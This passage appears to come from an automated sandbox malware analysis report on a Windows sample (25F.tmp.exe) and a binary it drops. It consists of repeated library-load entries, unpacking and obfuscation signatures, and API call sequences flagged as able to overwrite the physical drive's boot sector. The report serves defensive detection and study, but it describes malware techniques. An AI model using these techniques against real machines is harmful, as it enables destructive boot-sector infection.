            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: secur32.dll
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\25F.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QgGhoOpxHPl.exe, 00000009.00000002.624007678.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.623894475.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000B.00000002.624028617.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000C.00000002.624002687.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000D.00000002.623566344.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000E.00000002.624079839.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000000F.00000002.623632104.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000010.00000002.623656498.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000011.00000000.386197187.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000012.00000002.623647954.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000013.00000002.623981000.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000014.00000000.387583156.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000015.00000002.623920086.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000016.00000002.623820405.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000017.00000000.391050949.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000019.00000002.623538208.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001A.00000000.391969074.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001B.00000000.392217468.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001D.00000000.392771743.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001E.00000002.623775125.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 0000001F.00000000.393702318.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000020.00000000.394071706.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000021.00000000.394366434.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000022.00000000.394702338.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000023.00000000.394946970.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000024.00000000.395128308.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000025.00000002.623951188.000000000123E000.00000002.00000001.01000000.00000005.sdmp, QgGhoOpxHPl.exe, 00000026.00000000.395491250.000000000123E000.00000002.00000001.01000000.00000005.sdmp, Qg

            Data Obfuscation

            barindex
            Detected unpacking (creates a PE file in dynamic memory)
            Source: C:\Users\user\Desktop\25F.tmp.exeUnpacked PE file: 2.2.25F.tmp.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exeUnpacked PE file: 4.2.25F.tmp.exe.360000.0.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exeUnpacked PE file: 4.2.25F.tmp.exe.400000.1.unpack
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_0040399B LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0040399B
            Source: 25F.tmp.exeStatic PE information: real checksum: 0x37c3c should be: 0x2f560
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_0060502C push 006052E0h; ret 0_2_006052D8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00604C3C push 00604C8Dh; ret 0_2_00604C85
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_0060983C push 00609874h; ret 0_2_0060986C
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00609880 push 006098A6h; ret 0_2_0060989E
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00602C98 push eax; ret 0_2_00602CD4
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_006085C4 push 00608740h; ret 0_2_00608738
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_006085BA push 00608740h; ret 0_2_00608738
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00604E6C push 00604E98h; ret 0_2_00604E90
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00604EA4 push 00604ED0h; ret 0_2_00604EC8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_006052B4 push 006052E0h; ret 0_2_006052D8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00608742 push 006087B3h; ret 0_2_006087AB
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00608744 push 006087B3h; ret 0_2_006087AB
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00604FF4 push 00605020h; ret 0_2_00605018
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_00605FC8 push ecx; mov dword ptr [esp], eax0_2_00605FC9
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_0060502C push 006052E0h; ret 2_2_006052D8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00604C3C push 00604C8Dh; ret 2_2_00604C85
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_0060983C push 00609874h; ret 2_2_0060986C
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00609880 push 006098A6h; ret 2_2_0060989E
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00602C98 push eax; ret 2_2_00602CD4
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_006085C4 push 00608740h; ret 2_2_00608738
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_006085BA push 00608740h; ret 2_2_00608738
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00604E6C push 00604E98h; ret 2_2_00604E90
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00604EA4 push 00604ED0h; ret 2_2_00604EC8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_006052B4 push 006052E0h; ret 2_2_006052D8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00608742 push 006087B3h; ret 2_2_006087AB
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00608744 push 006087B3h; ret 2_2_006087AB
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00604FF4 push 00605020h; ret 2_2_00605018
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00605FC8 push ecx; mov dword ptr [esp], eax2_2_00605FC9
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_00404290 push eax; ret 2_2_004042BE
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00370F10 push eax; ret 4_2_00370F3E
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_00410F10 push eax; ret 4_2_00410F3E

            Persistence and Installation Behavior

            barindex
            Contains functionality to infect the boot sector
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE04_2_00369EC0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE04_2_00369D90
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE04_2_00409EC0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE04_2_00409D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE09_2_003D9EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE09_2_003D9D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE010_2_00189EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE010_2_00189D90
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE011_2_00389EC0
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: VirtualAlloc,CreateFileA,DeviceIoControl,SetFilePointer,WriteFile,WriteFile,SetFilePointer,WriteFile,WriteFile,DeviceIoControl, \\.\PHYSICALDRIVE011_2_00389D90
